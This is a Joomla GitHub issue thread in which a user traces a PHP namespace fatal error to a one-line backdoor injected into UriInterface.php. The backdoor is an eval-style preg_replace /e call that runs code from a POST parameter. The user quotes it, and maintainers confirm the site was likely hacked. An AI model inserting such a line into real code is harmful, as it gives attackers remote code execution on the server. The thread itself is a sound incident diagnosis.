### ISSUE TITLE
Fatal error: Namespace declaration statement has to be the very first statement in the script in /home/greenhillspsycho/public_html/libraries/vendor/joomla/uri/src/UriInterface.php on line 10

### ISSUE THREAD

**Issue by jarutosurano** [joomla/joomla-cms#8799]
After fixing a blank screen, I got this fatal error: Fatal error: Namespace declaration statement has to be the very first statement in the script in /home/greenxxxxxxxx/public_html/libraries/vendor/joomla/uri/src/UriInterface.php on line 10

How to fix a blank screen --> http://www.joomlabamboo.com/blog/how-to-joomla/how-to-fix-a-blank-screen-after-upgrading-to-joomla-3-2

**Comment by jarutosurano** [comment]
I locate the file and compare the code from my backup file and I found out that there's a coded added at the header of the code:

<?php @preg_replace('/(.*)/e', @$_POST['dnpivijtfrdn'], '');


I simply remove this one -->   @preg_replace('/(.*)/e', @$_POST['dnpivijtfrdn'], ''); or UPLOAD the backup file.

**Comment by mbabker** [comment]
The namespace declaration is the first non comment line in that file.
Anything that isn't `namespace Joomla\Uri;` as the first line after the
file doc block would mean the file has been altered in some way.

**Comment by jarutosurano** [comment]
Does it mean my site has been hacked?

**Comment by mbabker** [comment]
Based on what you posted its a fair assumption.

**Comment by jarutosurano** [comment]
I see. Thanks, Mbabker. Do you have Joomla extensions that will help me detect hacked files?

**Comment by bcordis** [comment]
Myjoomla

On Sunday, December 27, 2015, jarutosurano <notifications@github.com> wrote:

> I see. Thanks, Mbabker. Do you have Joomla extensions that will help me
> detect hacked files?
>
> —
> Reply to this email directly or view it on GitHub
> <https://github.com/joomla/joomla-cms/issues/8799#issuecomment-167461153>.
>


-- 
Sent from Gmail Mobile

**Comment by brianteeman** [comment]
Closed as it is now clear that this is not an issue with the core joomla files but a specific issue (most likely a hack) to a specific site<hr /><sub>This comment was created with the <a href="https://github.com/joomla/jissues">J!Tracker Application</a> at <a href="https://issues.joomla.org/tracker/joomla-cms/8799">issues.joomla.org/joomla-cms/8799</a>.</sub>
